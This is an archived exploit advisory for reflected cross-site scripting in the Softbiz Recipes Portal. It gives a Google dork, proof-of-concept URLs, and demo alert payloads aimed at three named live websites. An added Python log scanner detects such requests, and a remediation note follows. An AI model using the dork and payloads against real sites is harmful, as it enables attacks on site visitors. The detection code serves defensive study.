Softbiz Recipes Portal Cross Site Scripting

2011.08.06
Credit: Net.Edit0r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################ In The Name Of God Iran ###############
########################################
# Exploit Title:Softbiz Recipes Portal Multiple XSS Vulnerabilities
# Author: Net.Edit0r
# Date : 2011-08-05
# home Page: http://Black-HG.Org ~ http://h4ckcity.Org
# Location : Iran
# Vendor or Software Link: http://www.softbizscripts.com/
# Contact : Black.hat.tm@Gmail.Com & Net.Edit0r@att.net
# Version: N/A
# Category:: webapps
# Google dork: "Powered by SoftbizScripts"
# Tested on: ubuntu 11.04 ~ Linux Back Track 5
####################################################################
# Proof Of Concept [POC]

http://site/[path]/admin/index.php?msg=[XSS]
http://site/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
http://site/[path]/signinform.php?errmsg=[XSS]
http://site/[path]/msg_confirm_mem.php?errmsg=[XSS]

# Demo [POC]

http://classifieds-market.net/signinform.php?errmsg="><script>alert(0)</script>
http://www.buy-sellcars.com/msg_confirm_mem.php?errmsg="><script>alert(0)</script>
http://www.micaregivers.org/caregivers/admin/index.php?msg="><script>alert(0)</script>

#########################################################################################
#Greetz To: DarkCoder , Dr.Niloo , Amir-MaGiC , H3x , Cyrus , D3adlY , 3H34N
Spical Th4nks: B3hz4d | Cru3l.b0y | M4Hd1 | Mikili | L0phtiran And All My Friendz
[ Pentesters.Ir ] , packetstormsecurity.org, 1337day.com ,securityreason.com
##########################################################################################
########################### Persian Gulf 4 Ever ~ I Love Iran And All Iranian People ####
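
The PoC URLs above all place the payload in a message parameter (msg or errmsg) that is reflected into the page. As an added example (not part of the original advisory or the vendor's code), the Python below scans web-server access logs for requests to those scripts whose message parameter decodes to HTML markup characters, including double-encoded values. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Script path suffix -> parameter the advisory's PoC shows reflected unescaped.
REFLECTED = {
    "/admin/index.php": "msg",
    "/signinform.php": "errmsg",
    "/msg_confirm_mem.php": "errmsg",
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')  # characters used by the PoC to break out of the HTML context

SAMPLE_LOG = [  # constructed lines, combined log format assumed
    '192.0.2.10 - - [05/Aug/2011:10:00:01 +0000] "GET /signinform.php?errmsg=Invalid+login HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Aug/2011:10:02:13 +0000] "GET /signinform.php?errmsg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 5161',
    '198.51.100.7 - - [05/Aug/2011:10:05:40 +0000] "GET /caregivers/admin/index.php?msg=%2522%253E%253Cb%253E HTTP/1.1" 200 4710',
    '192.0.2.10 - - [05/Aug/2011:10:06:02 +0000] "GET /msg_confirm_mem.php?errmsg=Thank+you HTTP/1.1" 200 2301',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines):
    """Return (line_number, path, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for suffix, param in REFLECTED.items():
            if url.path.endswith(suffix):
                for name, value in parse_qsl(url.query, keep_blank_values=True):
                    value = fully_decode(value)
                    if name == param and MARKUP.search(value):
                        hits.append((number, url.path, name, value))
    return hits


if __name__ == "__main__":
    print(*suspicious_requests(SAMPLE_LOG), sep="\n")
```

A hit shows only that such a request was made, not that a browser executed anything. On the application side the corresponding fix for CWE-79 is to HTML-encode msg and errmsg when they are written into the page.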

